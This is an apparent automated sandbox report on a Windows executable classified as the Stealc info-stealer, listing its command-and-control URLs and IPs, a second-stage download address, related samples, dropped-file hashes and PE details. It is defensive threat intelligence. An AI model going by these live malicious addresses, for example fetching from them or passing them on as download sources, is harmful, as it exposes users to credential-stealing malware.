http://92.255.57.89/697b92cb4e247842/sqlite3.dll	B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000970000.00000004.00000020.00020000.00000000.sdmp, B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.89/45c616e921a794b8.phpsition:	B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.56.70	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
92.255.57.89	unknown	Russian Federation	42253	TELSPRU	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572917
Start date and time:	2024-12-11 08:56:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LXS5itpTK7.exe renamed because original name is a hash value
Original Sample Name:	99fad17313297da97105802d647b80b6.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 53 Number of non-executed functions: 330
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.147.0, 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:56:57	API Interceptor	8505354x Sleep call for process: LXS5itpTK7.exe modified
02:57:27	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.56.70	ief722WreR.exe	Get hash	malicious	Stealc	Browse
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse
	Tg3sk2wywR.exe	Get hash	malicious	Stealc	Browse
	x8AH98H0eQ.exe	Get hash	malicious	Stealc	Browse
	x8AH98H0eQ.exe	Get hash	malicious	Unknown	Browse
	zGHItMC5Zc.exe	Get hash	malicious	Stealc	Browse
	ozcAR7VO6Y.exe	Get hash	malicious	Stealc	Browse
	9gBcr7l7jT.exe	Get hash	malicious	Stealc	Browse
92.255.57.89	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	mMgFHz9PdG.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	vCZfRWB1kd.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
176.113.115.19	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse	172.67.179.207

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/	Get hash	malicious	Unknown	Browse	104.26.5.15
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	104.21.27.3
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	104.21.27.3
	https://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exe	Get hash	malicious	Havoc	Browse	172.67.0.58
	Itaxyhi.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.158.81
	https://hongkongliving.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.33.8
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
TELSPRU	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	mMgFHz9PdG.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	vCZfRWB1kd.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
SELECTELRU	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.215
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	45.89.231.211
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.163
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	45.138.214.123
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	176.124.33.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	104.21.56.70
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	Confirm revised invoice to proceed with payment ASAP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	Bank Swift and SOA PRN0072700314159453_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.56.70
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_B5F8.tmp.exe_63153db8d6331de160a6e57152d3dfaa832bd33f_500334a2_8f490bfc-1dd6-4732-a78b-9b7cf4dd05f9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9656224012487049
Encrypted:	false
SSDEEP:	192:mBGQoWUl0z9acvUbjBmZroZtzuiFrZ24IO8x:EGPWUGz9aKUbjTTzuiFrY4IO8x
MD5:	86436B9A2AF39F39CCB870FE6A20112E
SHA1:	CA305719C50796F06D5640B69B7CC99EA7CE611D
SHA-256:	F95D3BB9D15B8B9FCAEA729A6C787E37DC41C858E63E0A3D93AA72969C90A1E4
SHA-512:	824E5CD095165793BFEF42D6598582A34FBF9ADDDF63F1A4D1A2F45E20E9C0A6F783F26A6142B5746C855ED67294701A4EA5951ACE00C3C70875DA6E198471AC
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.7.7.4.2.3.5.3.1.6.5.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.7.7.4.2.4.1.4.1.0.4.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.f.4.9.0.b.f.c.-.1.d.d.6.-.4.7.3.2.-.a.7.8.b.-.9.b.7.c.f.4.d.d.0.5.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.8.c.c.a.c.e.-.2.9.4.5.-.4.0.a.b.-.9.4.3.0.-.f.1.9.8.d.a.d.0.4.c.f.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.5.F.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.4.0.-.0.0.0.1.-.0.0.1.4.-.6.c.1.0.-.f.3.4.1.a.2.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.4.b.3.b.5.c.c.2.9.1.7.2.b.b.3.c.9.9.3.6.b.4.9.c.2.e.b.6.e.0.1.0.0.0.0.f.f.f.f.!.0.0.0.0.2.1.3.9.5.f.c.3.4.7.e.1.6.7.b.8.8.9.8.1.8.4.6.1.b.e.c.c.a.2.e.2.4.2.f.8.8.9.a.f.!.B.5.F.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9783.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 11 07:57:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	68550
Entropy (8bit):	2.0938079184507683
Encrypted:	false
SSDEEP:	384:UJXs5P0RRRTmsOeGDXMG9xE37+ofz2rNnQ2S:UJ810RRTTSDXMG9xEL+o6Q2S
MD5:	D6A6B1DE292926F4ED3C3D2F9A77DF40
SHA1:	BF724B34B90C96397C40E2012DF503E644392C6E
SHA-256:	8BC23F878823D887334793AAA97A5DCD1400CC9D3BF96B3E933E91BDAB98370A
SHA-512:	3D93788F105B2DBD1BE19729E9A66634DDD52967AE0A7C5F15F3B3607ACC4DB0D9AD5E187235416ADEF2DAC1FB5AB4780F20BCB9DB610830A5AE1C0833D5BEDA
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........EYg............4...............<.......4....*..........T.......8...........T...........(3..........................................................................................................eJ......H.......GenuineIntel............T.......@....EYg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER987E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8310
Entropy (8bit):	3.700427059170085
Encrypted:	false
SSDEEP:	192:R6l7wVeJYs6oWFf6Ybr65gmfnCvUkpDT89bD0sfUAhm:R6lXJD6oWFf6YX65gmfnQUNDnfG
MD5:	6B9788CC66BC795CAC1049E8E3E997B6
SHA1:	A5AE2210F58F4A694C30D1135170499222FA2433
SHA-256:	EB8F10133CF7F8F2C0C917EE256FAEDFE635A3F54E39BE7229FA5EB9E8B23893
SHA-512:	42CAFBC34C06C01FDA97E57D74746E2E88EB867F3DD8478818873271CF9D18AC2A43058508D96F0AA00D3E0799D02DD591819C296E2777878FC9F78E75AA198F
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER989F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4573
Entropy (8bit):	4.452160827850141
Encrypted:	false
SSDEEP:	48:cvIwWl8zslJg77aI95GWpW8VYMYm8M4JWgFf+q8azH0FbfzCXrd:uIjf/I73H7VwJBnHofzCXrd
MD5:	EFD54864621885CDF5B101AE0ABC58E3
SHA1:	788000AE5ADCF4AACF8AB2E2BF7F0E34E794B4CF
SHA-256:	D2FD2F945CB1FC06A9AFA9A2B9C1F21DF76E5D1C04A418BD1CD94D83BE3CB49F
SHA-512:	6BAB993ADE3DAB1DBAEA818AE048194EDAFA25695E1ED5CAE3F72AEC58476BCE523444072EA1F0A9BD9CD0863458C1DABB079AEFF6AA616058ACB30C2E327086
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="626339" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\LXS5itpTK7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	391680
Entropy (8bit):	5.99781776583682
Encrypted:	false
SSDEEP:	3072:CmFmix9LrJ+unBU9MA1jTwoElX2kWSKV+AA47nlsms4vwV6RWqChEypWHz0C8nWt:BFVLrBBUb17EXK3h9NoOxuMHwOtApO
MD5:	1A1D5627373ECD30414938E941F281B8
SHA1:	21395FC347E167B889818461BECCA2E242F889AF
SHA-256:	FA20B849EBE7C53D59F3ED0FCFAC8445EA08E7296AF5ADA0D3BE2AACE5D727E8
SHA-512:	43FE3B2DC363C5620C5C2C1A01B70F46CFB2AD8FB925816EF18ADC4DC68D172C88E45A4D3C98ADC299BADC9890A3FF7106526D31E8714278567923F54BA779B2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q].03..03..03..b...03..b...03..b...03...H..03..02..03..b...03..b...03..b...03.Rich.03.........PE..L...5,.d.................Z...........D.......p....@...........................%.....d1......................................._..x.... ...;...........................................................-..@............................................text...>Y.......Z.................. ..`.data........p...`...^..............@....rsrc........ ...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Download File

Process:	C:\Users\user\Desktop\LXS5itpTK7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	391680
Entropy (8bit):	5.99781776583682
Encrypted:	false
SSDEEP:	3072:CmFmix9LrJ+unBU9MA1jTwoElX2kWSKV+AA47nlsms4vwV6RWqChEypWHz0C8nWt:BFVLrBBUb17EXK3h9NoOxuMHwOtApO
MD5:	1A1D5627373ECD30414938E941F281B8
SHA1:	21395FC347E167B889818461BECCA2E242F889AF
SHA-256:	FA20B849EBE7C53D59F3ED0FCFAC8445EA08E7296AF5ADA0D3BE2AACE5D727E8
SHA-512:	43FE3B2DC363C5620C5C2C1A01B70F46CFB2AD8FB925816EF18ADC4DC68D172C88E45A4D3C98ADC299BADC9890A3FF7106526D31E8714278567923F54BA779B2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q].03..03..03..b...03..b...03..b...03...H..03..02..03..b...03..b...03..b...03.Rich.03.........PE..L...5,.d.................Z...........D.......p....@...........................%.....d1......................................._..x.... ...;...........................................................-..@............................................text...>Y.......Z.................. ..`.data........p...`...^..............@....rsrc........ ...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421493790088694
Encrypted:	false
SSDEEP:	6144:JSvfpi6ceLP/9skLmb0OT1WSPHaJG8nAgeMZMMhA2fX4WABlEnNG0uhiTw:AvloT1W+EZMM6DFyo03w
MD5:	0E65230BB4F51CE390400C75160A1025
SHA1:	C8F645C1BCA7A608F6966F3A8A4334D12CB29BE5
SHA-256:	C193ECB6E0BA0BBB1F165269F04CD806F81FE73D43B78EED0E0FFB74FAA40B8F
SHA-512:	9C9E8E83985A34E4463C625A75673C31C91A6AB792506C0EE23A6107E52AD908FA1C2194C9D8F578380D758EE6372B61D6095C782B9019935CB05B8CF5082DDC
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmn..C.K..............................................................................................................................................................................................................................................................................................................................................j..w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.428466309369689
TrID:	Win32 Executable (generic) a (10002005/4) 99.55% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LXS5itpTK7.exe
File size:	461'824 bytes
MD5:	99fad17313297da97105802d647b80b6
SHA1:	6c2dea3d27486863a220b9dfc7ee30d8dd65903b
SHA256:	6edf3196e1691e0034185df3ac2eaad51a33248c305e35927fb5f6b5e13fa58e
SHA512:	40de9a35ddf446b5b21a07c2dc4c4074bf9bd1d024c4a7c368f5f770a705c83d8e9f4f258ad6d4bf510617b5bb0f2a070e6a0fd100aa25e5d3aacc7431e34466
SSDEEP:	6144:z2hLDaY1jCphfzS+2Yex/korSNb5xBHGJ0gzYAq:6hfaKUhfmxZIb5vGF
TLSH:	03A4022172D1C0B2C4D696354439C7B1AE7AB4326AB5A84B73B8137E7F703D1A63271B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q]..03..03..03..b...03..b...03..b...03...H..03..02..03..b...03..b...03..b...03.Rich.03.........PE..L....r.f.................l.

File Icon


Icon Hash:	86c7c30b0f4e0d99

Static PE Info

General

Entrypoint:	0x40441f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x661C7210 [Mon Apr 15 00:17:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d3615be1139396edbe67ecebf8b56134

Entrypoint Preview

Instruction
call 00007F0E390C219Eh
jmp 00007F0E390BDB6Eh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007F0E390C221Eh
mov dword ptr [esi], 00401234h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00401234h
jmp 00007F0E390C22B6h
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00401234h
call 00007F0E390C22A3h
test byte ptr [ebp+08h], 00000001h
je 00007F0E390BDCF9h
push esi
call 00007F0E390BD569h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007F0E390BDD39h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007F0E390BDD31h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007F0E390BDD06h
add ecx, 08h
push ecx
push edx
call 00007F0E390C22FFh
pop ecx
pop ecx
test eax, eax
je 00007F0E390BDCF6h
xor eax, eax
jmp 00007F0E390BDD16h
test byte ptr [esi], 00000002h
je 00007F0E390BDCF7h
test byte ptr [edi], 00000008h
je 00007F0E390BDCE4h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007F0E390BDCF7h
test byte ptr [edi], 00000001h
je 00007F0E390BDCD6h
test al, 02h
je 00007F0E390BDCF7h
test byte ptr [edi], 00000002h
je 00007F0E390BDCCDh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x670c8	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x73000	0x3bb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d90	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1b4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66aee	0x66c00	11bc6738ae4f6ab572d56a9b399df11d	False	0.6872315047141119	data	6.658344735434964	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x68000	0xaba8	0x6000	985d9eaed3b4aa53ddf226f820c99b4b	False	0.08040364583333333	data	0.9439282747751255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x73000	0x3bb8	0x3c00	6fd014db329ccb241ca515918eb24915	False	0.7509114583333333	data	6.410985848492826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x73210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.8076036866359447
RT_ICON	0x73210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.8076036866359447
